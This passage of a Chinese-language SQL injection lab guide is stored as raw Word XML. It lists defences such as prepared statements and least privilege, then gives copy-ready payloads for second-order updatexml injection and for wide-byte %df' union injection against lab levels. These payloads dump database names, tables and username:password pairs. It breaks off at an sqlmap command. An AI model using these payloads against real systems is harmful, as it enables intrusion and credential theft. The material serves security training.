    <w:p w14:paraId="227A2CDA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2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用参数化查询：全程使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PDO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mysqli_prepare()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>预编译语句，禁止动态字符串拼接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，从根源阻断所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注入（最有效的防御方式）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843D94A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3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>替换不安全转义函数：用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mysqli_real_escape_string()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>替代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>addslashes()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，并通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mysqli_set_charset()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>明确设置字符集，增强转义安全性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170E0A0B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4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>二次校验：对于从数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>库取出的数据，再次进行过滤、校验（如白名单校验、转义），避免二次调用时的注入风险（针对二次注入）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EA38F6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5.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最小权限原则：为数据库用户分配最小必要权限（如仅分配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>select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/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>insert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>禁止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>drop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/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>alter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/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等高危权限），即使注入成功，也无法执行高危操作，降低危害。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028BC86A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6.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>输入校验：对用户输入进行严格校验（如数字型参数强制转为整数，字符串参数做白名单过滤），减少注入攻击面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE324F" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="heading_30"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>第五部分：可直接复制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>汇总（实操专用）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="01BB8BC1" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="heading_31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>一、二次注入（第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>关）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="69567535" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="heading_32"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>基础注入（获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>密码）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="55A8981F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1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注册用户名（直接复制，修正后）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A' or updatexml(1,concat(0x7e,(version())),0)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6108A0CA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2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注册密码（任意）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4DEDD1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3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注册邮箱（任意）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>test@test.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C1CB5D" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="heading_33"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>进阶报错注入（无回显时）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="499A7528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1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>爆数据库版本号（注册用户名，修正后）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A' or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>updatexml(1,concat(0x7e,(version())),0)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206BCCC6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2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>爆表名（注册用户名，修正后）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F3939C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3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>爆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>表字段名（注册用户名，修正后）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A' or updatexml(1,concat(0x7e,(sele</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ct group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),0x7e),0)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19062526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4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>爆账号密码（注册用户名，修正后）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A' or updatexml(1,concat(0x7e,(select group_concat(concat(username,0x3a,password)) from users),0x7e),0)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403FCBD0" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="heading_34"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>二、宽字节注入（第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>关）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>（直接复制使用）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="4F75D6C8" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="heading_35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>基础探测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="01F9FC9F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1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>探测注入点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/06.php?id=1%df'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4455FF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2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>探测列数（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>列）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/06.php?id=1%df' order by 3--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14673F48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3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>确定回显位：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/06.php?id=-1%df' union select 1,2,3--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A831FD" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="heading_36"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>核心注入（获取数据）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="69A61654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1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>爆当前数据库名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/06.php?id=-1%d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>f' union select 1,2,database()--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5870D2AE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2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>爆所有表名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/06.php?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A42E0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3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>爆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>表字段名（无报错）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/06.php?id=-1%df' union select 1,2,g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>roup_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B55BBBB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4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>爆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>表账号密码：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/06.php?id=-1%df' union select 1,2,group_concat(concat(username,0x3a,password)) from users--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565B7E0C" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="heading_37"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>自动化注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="621AF7C2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1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>获取当前数据库：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sqlmap -u "http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
